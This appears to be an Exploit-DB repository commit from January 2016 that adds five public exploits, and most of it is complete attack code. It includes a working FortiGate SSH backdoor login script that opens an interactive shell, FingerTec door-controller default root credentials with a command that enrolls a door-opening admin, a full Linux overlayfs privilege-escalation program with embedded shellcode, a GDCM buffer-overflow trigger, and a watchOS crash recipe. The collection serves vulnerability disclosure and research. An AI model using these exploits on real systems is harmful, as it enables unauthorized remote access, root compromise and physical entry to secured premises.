DB: 2016-01-13

5 new exploits

files.csv

@@ -35399,6 +35399,8 @@ id,file,description,date,author,platform,type,port
 39145,platforms/cgi/webapps/39145.txt,"Xangati XSR And XNR 'gui_input_test.pl' Remote Command Execution Vulnerability",2014-04-14,"Jan Kadijk",cgi,webapps,0
 39146,platforms/php/webapps/39146.txt,"Jigowatt PHP Event Calendar 'day_view.php' SQL Injection Vulnerability",2014-04-14,"Daniel Godoy",php,webapps,0
 39147,platforms/osx/local/39147.c,"Apple Mac OS X Local Security Bypass Vulnerability",2014-04-22,"Ian Beer",osx,local,0
+39225,platforms/hardware/dos/39225.txt,"Apple watchOS 2 - Crash PoC",2016-01-12,"Mohammad Reza Espargham",hardware,dos,0
+39227,platforms/hardware/remote/39227.txt,"FingerTec Fingerprint Reader - Remote Access and Remote Enrollment",2016-01-12,"Daniel Lawson",hardware,remote,0
 39150,platforms/php/webapps/39150.txt,"Open Audit SQL Injection Vulnerability",2016-01-02,"Rahul Pratap Singh",php,webapps,0
 39151,platforms/lin_x86-64/shellcode/39151..c,"x86_64 Linux bind TCP port shellcode",2016-01-02,Scorpion_,lin_x86-64,shellcode,0
 39152,platforms/linux/shellcode/39152..c,"TCP Bindshell with Password Prompt - 162 bytes",2016-01-02,"Sathish kumar",linux,shellcode,0
@@ -35469,3 +35471,6 @@ id,file,description,date,author,platform,type,port
 39221,platforms/win64/dos/39221.txt,"Adobe Flash - Use-After-Free When Setting Stage",2016-01-11,"Google Security Research",win64,dos,0
 39222,platforms/multiple/remote/39222.txt,"Foreman Smart-Proxy Remote Command Injection Vulnerability",2014-06-05,"Lukas Zapletal",multiple,remote,0
 39223,platforms/php/webapps/39223.txt,"ZeusCart 'prodid' Parameter SQL Injection Vulnerability",2014-06-24,"Kenny Mathis",php,webapps,0
+39224,platforms/hardware/remote/39224.py,"FortiGate OS Version 4.x - 5.0.7 - SSH Backdoor",2016-01-12,operator8203,hardware,remote,22
+39229,platforms/linux/dos/39229.cpp,"Grassroots DICOM (GDCM) 2.6.0 and 2.6.1 - ImageRegionReader::ReadIntoBuffer Buffer Overflow",2016-01-12,"Stelios Tsampas",linux,dos,0
+39230,platforms/linux/local/39230.c,"Linux Kernel overlayfs - Local Privilege Escalation",2016-01-12,halfdog,linux,local,0

platforms/hardware/dos/39225.txt

@@ -0,0 +1,25 @@
+#[+] Title:  Apple watchOS - Remote Crash Exploit
+#[+] Product: Apple
+#[+] Vendor: www.apple.com
+#[+] SoftWare Link : www.apple.com/watchos-2/
+#[+] Vulnerable Version(s): watchOS on IOS 9.0.1
+#
+#
+# Author      :   Mohammad Reza Espargham
+# Linkedin    :   https://ir.linkedin.com/in/rezasp
+# E-Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
+# Website     :   www.reza.es
+# Twitter     :   https://twitter.com/rezesp
+# FaceBook    :   https://www.facebook.com/reza.espargham
+
+
+#  1. open your phone Clock / goto Alarm
+# 2. add alarm / set time [for example two minutes later]
+# 3. click label /  input 5000 x “0"
+# 4. Save
+# 5. Lock Your phone and wait for alarm
+# 6. When the alarm clock rings / Watch Crashed ;)
+
+
+
+

platforms/hardware/remote/39224.py

@@ -0,0 +1,77 @@
+#!/usr/bin/env python
+
+# SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7
+# Usage: ./fgt_ssh_backdoor.py <target-ip>
+
+import socket
+import select
+import sys
+import paramiko
+from paramiko.py3compat import u
+import base64
+import hashlib
+import termios
+import tty
+
+def custom_handler(title, instructions, prompt_list):
+    n = prompt_list[0][0]
+    m = hashlib.sha1()
+    m.update('\x00' * 12)
+    m.update(n + 'FGTAbc11*xy+Qqz27')
+    m.update('\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70')
+    h = 'AK1' + base64.b64encode('\x00' * 12 + m.digest())
+    return [h]
+
+
+def main():
+    if len(sys.argv) < 2:
+        print 'Usage: ' + sys.argv[0] + ' <target-ip>'
+        exit(-1)
+
+    client = paramiko.SSHClient()
+    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
+
+    try:
+        client.connect(sys.argv[1], username='', allow_agent=False, look_for_keys=False)
+    except paramiko.ssh_exception.SSHException:
+        pass
+
+    trans = client.get_transport()
+    try:
+        trans.auth_password(username='Fortimanager_Access', password='', event=None, fallback=True)
+    except paramiko.ssh_exception.AuthenticationException:
+        pass
+
+    trans.auth_interactive(username='Fortimanager_Access', handler=custom_handler)
+    chan = client.invoke_shell()
+
+    oldtty = termios.tcgetattr(sys.stdin)
+    try:
+        tty.setraw(sys.stdin.fileno())
+        tty.setcbreak(sys.stdin.fileno())
+        chan.settimeout(0.0)
+
+        while True:
+            r, w, e = select.select([chan, sys.stdin], [], [])
+            if chan in r:
+                try:
+                    x = u(chan.recv(1024))
+                    if len(x) == 0:
+                        sys.stdout.write('\r\n*** EOF\r\n')
+                        break
+                    sys.stdout.write(x)
+                    sys.stdout.flush()
+                except socket.timeout:
+                    pass
+            if sys.stdin in r:
+                x = sys.stdin.read(1)
+                if len(x) == 0:
+                    break
+                chan.send(x)
+
+    finally:
+        termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldtty)
+
+
+if __name__ == '__main__':
+    main()

platforms/hardware/remote/39227.txt

@@ -0,0 +1,23 @@
+# Exploit Title: Default Root Password and Remote Enrollment on FingerTec Devices 
+# Date: 12-01-2016 
+# Exploit Author: Daniel Lawson 
+# Contact: http://twitter.com/fang0654 
+# Website: https://digital-panther.com 
+# Category: physical access control 
+
+1. Description 
+
+Almost all FingerTec Access Control devices are running with open telnet, with a hardcoded default root password. Additionally, it is trivial to enroll a new administrative user on the device with a pin code or RFID card that will allow opening the door. 
+
+2. Proof of Concept 
+
+Login to telnet with the credentials: root / founder88 
+At the console type in the command: 
+echo -n -e \\\\x39\\\\x5\\\\x6\\\\x31\\\\x32\\\\x33\\\\x34\\\\x35\\\\x48\\\\x61\\\\x78\\\\x78\\\\x30\\\\x72\\\\x0\\\\x0\\\\x0\\\\x0\\\\x0\\\\x0\\\\x0\\\\x1\\\\x0\\\\x0\\\\x39\\\\x5\\\\x0\\\\x0 >> user.dat 
+This will create a user named Haxx0r with an id of 1337 and a pin of 12345. 
+--- 
+
+Daniel Lawson 
+Digital Panther Security 
+https://digital-panther.com 
+

platforms/linux/dos/39229.cpp

@@ -0,0 +1,89 @@
+/*
+Grassroots DICOM (GDCM) is a C++ library for processing DICOM medical
+images.
+It provides routines to view and manipulate a wide range of image formats
+and can be accessed through many popular programming languages like Python,
+C#, Java and PHP.
+
+GDCM versions 2.6.0 and 2.6.1 (and possibly previous versions) are prone
+to an
+integer overflow vulnerability which leads to a buffer overflow and
+potentially to remote code execution. The vulnerability is triggered by the
+exposed function gdcm::ImageRegionReader::ReadIntoBuffer, which copies
+DICOM
+image data to a buffer. ReadIntoBuffer checks whether the supplied
+buffer is
+large enough to hold the necessary data, however in this check it fails to
+detect the occurrence of an integer overflow, which leads to a buffer
+overflow
+later on in the code. The buffer overflow will occur regardless of the
+size of
+the buffer supplied to the ReadIntoBuffer call.
+
+More information about this vulnerability can be found at
+http://census-labs.com/news/2016/01/11/gdcm-buffer-overflow-imageregionreaderreadintobuffer/
+
+The GDCM project has released version 2.6.2 that addresses this issue.
+It is advised to upgrade all GDCM installations to the latest stable
+release.
+
+Disclosure Timeline
+-------------------
+CVE assignment:    December 2nd, 2015
+Vendor Contact:    December 4th, 2015
+Vendor Patch Release: December 23rd, 2015
+Public Advisory: January 11th, 2016
+*/
+
+#include "gdcmReader.h"
+#include "gdcmImageReader.h"
+#include "gdcmImageRegionReader.h"
+#include "gdcmBoxRegion.h"
+#include "gdcmImageHelper.h"
+
+#include <iostream>
+
+using namespace std;
+
+/*
+ * A simple demonstration of CVE-2015-8396
+ * by Stelios Tsampas (stelios at census-labs.com)
+ * based on http://gdcm.sourceforge.net/html/ExtractImageRegion_8cs-example.html
+ *
+ * Compiles with:
+ * $ g++ -I/usr/include/gdcm-2.6 -o CVE-2015-8396-trigger CVE-2015-8396-trigger.cpp -lgdcmCommon -lgdcmMSFF -lgdcmDSED
+ *
+ * Try it on http://census-labs.com/media/CVE-2015-8396.dcm.bz2
+ *                https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39229.zip
+ * $ bzip2 -d CVE-2015-8396.dcm.bz2
+ * $ ./CVE-2015-8396-trigger CVE-2015-8396.dcm
+ */
+
+int main(int argc, char *argv [])
+{
+	char buffer[2048 * 2047];
+	gdcm::ImageRegionReader reader;
+	gdcm::BoxRegion box;
+
+	if (argc < 2) {
+		cout << "Usage: example <input-file>\n";
+		return 1;
+	}
+
+	const char *filename = argv[1];
+	reader.SetFileName(filename);
+	
+	if (!reader.ReadInformation()) {
+		cout << "No info from file\n";
+		return 1;
+	}
+
+	std::vector<unsigned int> dims = gdcm::ImageHelper::GetDimensionsValue(reader.GetFile());
+	cout << "x: " << dims[0] << ", y: " << dims[1] << ", z: " << dims[2] << "\n";
+
+	box.SetDomain(0, dims[0] - 1, 0, dims[1] - 1, 0, dims[2] - 1);
+	reader.SetRegion(box);
+	reader.ReadIntoBuffer(buffer, sizeof(buffer));
+	
+	return 0;
+}

platforms/linux/local/39230.c

@@ -0,0 +1,257 @@
+/** This software is provided by the copyright owner "as is" and any
+ *  expressed or implied warranties, including, but not limited to,
+ *  the implied warranties of merchantability and fitness for a particular
+ *  purpose are disclaimed. In no event shall the copyright owner be
+ *  liable for any direct, indirect, incidential, special, exemplary or
+ *  consequential damages, including, but not limited to, procurement
+ *  of substitute goods or services, loss of use, data or profits or
+ *  business interruption, however caused and on any theory of liability,
+ *  whether in contract, strict liability, or tort, including negligence
+ *  or otherwise, arising in any way out of the use of this software,
+ *  even if advised of the possibility of such damage.
+ *
+ *  Copyright (c) 2015 halfdog <me (%) halfdog.net>
+ *
+ *  This program demonstrates how to escalate privileges using
+ *  an overlayfs mount within a user namespace. See
+ *  http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
+ *  for more information.
+ *
+ *  gcc -o UserNamespaceOverlayfsSetuidWriteExec UserNamespaceOverlayfsSetuidWriteExec.c
+ *
+ *  Usage: UserNamespaceOverlayfsSetuidWriteExec -- [program] [args]
+ *
+ */
+
+#define _GNU_SOURCE
+#include <errno.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/stat.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mount.h>
+#include <sys/resource.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+extern char **environ;
+
+static int childFunc(void *arg) {
+  fprintf(stderr, "euid: %d, egid: %d\n", geteuid(), getegid());
+  while(geteuid()!=0) {
+    usleep(100);
+  }
+  fprintf(stderr, "euid: %d, egid: %d\n", geteuid(), getegid());
+
+  int result=mount("overlayfs", "/tmp/x/bin", "overlayfs", MS_MGC_VAL, "lowerdir=/bin,upperdir=/tmp/x/over,workdir=/tmp/x/bin");
+  if(result) {
+    fprintf(stderr, "Overlay mounting failed: %d (%s)\n", errno, strerror(errno));
+    return(1);
+  }
+  chdir("/tmp/x/bin");
+  result=chmod("su", 04777);
+  if(result) {
+    fprintf(stderr, "Mode change failed\n");
+    return(1);
+  }
+
+  fprintf(stderr, "Namespace helper waiting for modification completion\n");
+  struct stat statBuf;
+  char checkPath[128];
+  sprintf(checkPath, "/proc/%d", getppid());
+  while(1) {
+    usleep(100);
+    result=stat(checkPath, &statBuf);
+
+    if(result) {
+      fprintf(stderr, "Namespacer helper: parent terminated\n");
+      break;
+    }
+// Wait until parent has escalated.
+    if(statBuf.st_uid) break;
+  }
+
+  chdir("/");
+  umount("/tmp/x/bin");
+  unlink("/tmp/x/over/su");
+  rmdir("/tmp/x/over");
+  rmdir("/tmp/x/bin/work");
+  rmdir("/tmp/x/bin");
+  rmdir("/tmp/x/");
+  fprintf(stderr, "Namespace part completed\n");
+
+  return(0);
+}
+
+
+#define STACK_SIZE (1024 * 1024)
+static char child_stack[STACK_SIZE];
+
+int main(int argc, char *argv[]) {
+  int argPos;
+  int result;
+  char *targetSuidPath="/bin/su";
+  char *helperSuidPath="/bin/mount";
+
+  for(argPos=1; argPos<argc; argPos++) {
+    char *argName=argv[argPos];
+    if(!strcmp(argName, "--")) {
+      argPos++;
+      break;
+    }
+    if(strncmp(argName, "--", 2)) {
+      break;
+    }
+
+    fprintf(stderr, "%s: unknown argument %s\n", argv[0], argName);
+    exit(1);
+  }
+
+  mkdir("/tmp/x", 0700);
+  mkdir("/tmp/x/bin", 0700);
+  mkdir("/tmp/x/over", 0700);
+
+// Create child; child commences execution in childFunc()
+// CLONE_NEWNS: new mount namespace
+// CLONE_NEWPID
+// CLONE_NEWUTS
+  pid_t pid=clone(childFunc, child_stack+STACK_SIZE,
+      CLONE_NEWUSER|CLONE_NEWNS|SIGCHLD, argv+argPos);
+  if(pid==-1) {
+    fprintf(stderr, "Clone failed: %d (%s)\n", errno, strerror(errno));
+    return(1);
+  }
+
+  char idMapFileName[128];
+  char idMapData[128];
+
+  sprintf(idMapFileName, "/proc/%d/setgroups", pid);
+  int setGroupsFd=open(idMapFileName, O_WRONLY);
+  if(setGroupsFd<0) {
+    fprintf(stderr, "Failed to open setgroups\n");
+    return(1);
+  }
+  result=write(setGroupsFd, "deny", 4);
+  if(result<0) {
+    fprintf(stderr, "Failed to disable setgroups\n");
+    return(1);
+  }
+  close(setGroupsFd);
+
+  sprintf(idMapFileName, "/proc/%d/uid_map", pid);
+  fprintf(stderr, "Setting uid map in %s\n", idMapFileName);
+  int uidMapFd=open(idMapFileName, O_WRONLY);
+  if(uidMapFd<0) {
+    fprintf(stderr, "Failed to open uid map\n");
+    return(1);
+  }
+  sprintf(idMapData, "0 %d 1\n", getuid());
+  result=write(uidMapFd, idMapData, strlen(idMapData));
+  if(result<0) {
+    fprintf(stderr, "UID map write failed: %d (%s)\n", errno, strerror(errno));
+    return(1);
+  }
+  close(uidMapFd);
+
+  sprintf(idMapFileName, "/proc/%d/gid_map", pid);
+  fprintf(stderr, "Setting gid map in %s\n", idMapFileName);
+  int gidMapFd=open(idMapFileName, O_WRONLY);
+  if(gidMapFd<0) {
+    fprintf(stderr, "Failed to open gid map\n");
+    return(1);
+  }
+  sprintf(idMapData, "0 %d 1\n", getgid());
+  result=write(gidMapFd, idMapData, strlen(idMapData));
+  if(result<0) {
+    fprintf(stderr, "GID map write failed: %d (%s)\n", errno, strerror(errno));
+    return(1);
+  }
+  close(gidMapFd);
+
+// Wait until /tmp/x/over/su exists
+  struct stat statBuf;
+  while(1) {
+    usleep(100);
+    result=stat("/tmp/x/over/su", &statBuf);
+    if(!result) break;
+  }
+
+// Overwrite the file
+  sprintf(idMapFileName, "/proc/%d/cwd/su", pid);
+
+// No slashes allowed, everything else is OK.
+  char suidExecMinimalElf[] = {
+      0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
+      0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,
+      0x80, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0xf8, 0x00, 0x00, 0x00,
+      0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x02, 0x00, 0x28, 0x00,
+      0x05, 0x00, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+      0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0xa2, 0x00, 0x00, 0x00,
+      0xa2, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
+      0x01, 0x00, 0x00, 0x00, 0xa4, 0x00, 0x00, 0x00, 0xa4, 0x90, 0x04, 0x08,
+      0xa4, 0x90, 0x04, 0x08, 0x09, 0x00, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00,
+      0x06, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+      0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x31, 0xc0, 0x89, 0xc8,
+      0x89, 0xd0, 0x89, 0xd8, 0x04, 0xd2, 0xcd, 0x80, 
+
+      0x31, 0xc0, 0x04, 0xd0, 0xcd, 0x80,
+
+      0x31, 0xc0, 0x89, 0xd0,
+      0xb0, 0x0b, 0x89, 0xe1, 0x83, 0xc1, 0x08, 0x8b, 0x19, 0xcd, 0x80
+  };
+  char *helperArgs[]={"/bin/mount", NULL};
+
+  int destFd=open(idMapFileName, O_RDWR|O_CREAT|O_TRUNC, 07777);
+  if(destFd<0) {
+    fprintf(stderr, "Failed to open %s, error %s\n", idMapFileName, strerror(errno));
+    return(1);
+  }
+
+  char *suidWriteNext=suidExecMinimalElf;
+  char *suidWriteEnd=suidExecMinimalElf+sizeof(suidExecMinimalElf);
+  while(suidWriteNext!=suidWriteEnd) {
+    char *suidWriteTestPos=suidWriteNext;
+    while((!*suidWriteTestPos)&&(suidWriteTestPos!=suidWriteEnd))
+      suidWriteTestPos++;
+// We cannot write any 0-bytes. So let seek fill up the file wihh
+// null-bytes for us.
+    lseek(destFd, suidWriteTestPos-suidExecMinimalElf, SEEK_SET);
+    suidWriteNext=suidWriteTestPos;
+    while((*suidWriteTestPos)&&(suidWriteTestPos!=suidWriteEnd))
+      suidWriteTestPos++;
+
+    pid_t helperPid=fork();
+    if(!helperPid) {
+      struct rlimit limits;
+
+// We can't truncate, that would remove the setgid property of
+// the file. So make sure the SUID binary does not write too much.
+      limits.rlim_cur=suidWriteTestPos-suidExecMinimalElf;
+      limits.rlim_max=limits.rlim_cur;
+      setrlimit(RLIMIT_FSIZE, &limits);
+
+// Do not rely on some SUID binary to print out the unmodified
+// program name, some OSes might have hardening against that.
+// Let the ld-loader will do that for us.
+      limits.rlim_cur=1<<22;
+      limits.rlim_max=limits.rlim_cur;
+      result=setrlimit(RLIMIT_AS, &limits);
+
+      dup2(destFd, 1);
+      dup2(destFd, 2);
+      helperArgs[0]=suidWriteNext;
+      execve(helperSuidPath, helperArgs, NULL);
+      fprintf(stderr, "Exec failed\n");
+      return(1);
+    }
+    waitpid(helperPid, NULL, 0);
+    suidWriteNext=suidWriteTestPos;
+  }
+  close(destFd);
+  execve(idMapFileName, argv+argPos-1, NULL);
+  fprintf(stderr, "Failed to execute %s: %d (%s)\n", idMapFileName,
+      errno, strerror(errno));
+  return(1);
+}